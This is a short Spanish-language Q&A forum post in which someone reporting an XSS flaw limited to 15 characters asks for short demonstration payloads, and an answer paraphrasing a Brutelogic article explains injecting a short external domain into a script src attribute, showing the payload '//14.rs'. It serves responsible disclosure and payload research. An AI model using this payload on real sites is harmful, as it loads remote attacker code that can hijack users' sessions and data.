Encontré una vulnerabilidad XSS en un sitio grande, y quiero reportarlo, pero el único límite a la vulnerabilidad es que solo permite 15 caracteres como máximo. Esto obviamente tiene límites a las cargas útiles que puede ejecutar.
¿Alguien sabe algunas cargas útiles interesantes de 15 caracteres o menos y demuestra la vulnerabilidad para reportarlo?
Brutelogic escribió un artículo brillante sobre esto en enlace Hace algún tiempo.
Una de las ideas del artículo (parafraseado):
.. Es posible que un parámetro de URL se haga eco en una fuente de un script:
<script src=“INPUT”></script>
Podemos usar esto para lanzar un ataque XSS completo que proporcione una fuente con un dominio corto como //14.rs (7 caracteres de longitud). Una variación reduce la inyección a solo 5 caracteres si las barras diagonales dobles ya están en código nativo:
<script src=“//INPUT”></script>
# <script src=“//14.rs”></script>
Lea otras preguntas en las etiquetas xss